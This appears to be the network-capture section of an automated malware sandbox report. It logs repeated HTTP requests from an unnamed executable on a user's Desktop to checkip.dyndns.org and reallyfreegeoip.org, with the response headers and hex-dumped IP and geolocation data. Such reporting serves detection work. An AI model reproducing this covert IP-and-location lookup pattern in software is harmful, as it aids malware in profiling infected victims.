                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.849722193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:36:53.858944893 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 12, 2024 07:36:54.510622978 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:54 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 5903d59eacd98c88210978133145dfc8
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.849724193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:36:55.265676975 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 12, 2024 07:36:56.994812012 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:56 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 8dd2abe7dd26a1ce071f7ffec75f2eb6
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.849726193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:36:57.775499105 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 12, 2024 07:37:00.246047974 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:37:00 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 07102b136d0ae98c03aef04928ebc03b
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.849728193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:37:01.014020920 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 12, 2024 07:37:02.744673014 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:37:02 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: d0a990db193ecbadeeea9913152c69b9
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.849716188.114.96.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:36:49 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:36:49 UTC854INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:49 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14632
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wwk97iwd4CWPZOkUw1pSWXtUIwocWFcigmVogmD%2BJQW8gsIu%2FviPHeOH%2BhuJEk%2Fkbz63znweH7ZgUl0OV8Gp2SzL3ABa2ZwO80eNuAUFR486dSvl%2Bk9XT8EjSxnXnbjVI9xIhnA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e148287bd8a4799-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1876&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1547835&cwnd=247&unsent_bytes=0&cid=c199c2a92c927df2&ts=222&x=0"
                                                                                                                                                2024-11-12 06:36:49 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.849717188.114.96.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:36:50 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-11-12 06:36:50 UTC846INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:50 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14633
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1HiriwtxyLs7CFHf9JqtNoLDHcLsX94ZL9h9PjFzBuyA1eqDliN3JfNkMa7lUVat5FoPjKtfg%2BPKrMqdKg96qs93b3d9YT4EJy1nlZBcZUPnznrplQZrwUMgZ1kk2KSfgCR6Pwg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e14828dff74e71e-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2218&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1316962&cwnd=235&unsent_bytes=0&cid=c6b6022c044f01f2&ts=154&x=0"
                                                                                                                                                2024-11-12 06:36:50 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.849719188.114.96.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:36:52 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-11-12 06:36:52 UTC852INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:52 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14635
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGQvtMdZAvXSdubkCHtpjw22xZEC77ZJ4%2FDRfmhFRpv6B%2BTTYQ9FiEEjUEIj2D9SD0N1BoL3LPKNwTSiXktjZBCiS%2F9f0RyRu61kBCEYnf2FAos2pzTArdX8q%2BzxkMyaMm377q8S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e14829b0eb72c87-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2375717&cwnd=228&unsent_bytes=0&cid=76e7321897af4200&ts=144&x=0"
                                                                                                                                                2024-11-12 06:36:52 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.849721188.114.96.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:36:53 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:36:53 UTC856INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:53 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14636
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxg6uoI%2B%2B65%2FbW5HMzyV%2FiuEDbqFpI0Px9nd1dCIY56LyZBvwERer%2Bc3oeKxcN%2Flen3PypOMyHuFJ0mRnhLHzh7k6BSMdMIzID9RNHIZAvSBG6TALWeH2UtPbNMzWlwphqtfTyID"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e1482a41e412cda-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1771253&cwnd=251&unsent_bytes=0&cid=81685d3ccc3213ef&ts=150&x=0"
                                                                                                                                                2024-11-12 06:36:53 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.849723188.114.96.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:36:55 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:36:55 UTC856INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:55 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14638
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikWQK0qCqSD75HutL%2BuhJWmyQ1zJZRkIOiVws3%2BKWs26oZ1qrRhDlnMSMvzGHlFJc29HxFBMQbl%2FyeGnesJhiDBgaSOwwYXU4r%2BD%2B03xOzLcSXLgOmuHz9UkGEu%2BOr80KRDFn4cb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e1482acec2e6b57-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2760724&cwnd=233&unsent_bytes=0&cid=a87a8a7fbb3a8ce9&ts=144&x=0"
                                                                                                                                                2024-11-12 06:36:55 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.849725188.114.96.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:36:57 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:36:57 UTC852INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:57 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14640
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJnTrVUWZKGXTHX40GuS%2F2%2FkLtc7RStWG%2BYA%2FFyqhMGoXHxroe4QRSgMHrjLqV32r398fZ7YP5Woz8FqCmXK0iVTC8rQxROlYEBl9dtFf9wDQcm23Y1KfIZvthdfzhiNA3kdLYY9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e1482bc88474791-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2425460&cwnd=244&unsent_bytes=0&cid=8bfca71eb9b2474b&ts=149&x=0"
                                                                                                                                                2024-11-12 06:36:57 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.849727188.114.97.34435916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-12 06:37:00 UTC87OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-12 06:37:01 UTC856INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:37:00 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 359
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 14643
                                                                                                                                                Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYR1jjiTf801byK57z4Ebt2zTz8LG%2ByNMLkKmNsQFpI%2BHrZlq2nVhhWHd4SNOkwkiqgTEvSI3K0q%2FjphkUsbYCqWBMEvXzw9zl4%2BlrwcSk2hSxlLh06pEs%2BPI8w9MjRX2h4fSpe%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e1482d0c9e2e756-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=72fec31a94f3b412&ts=149&x=0"
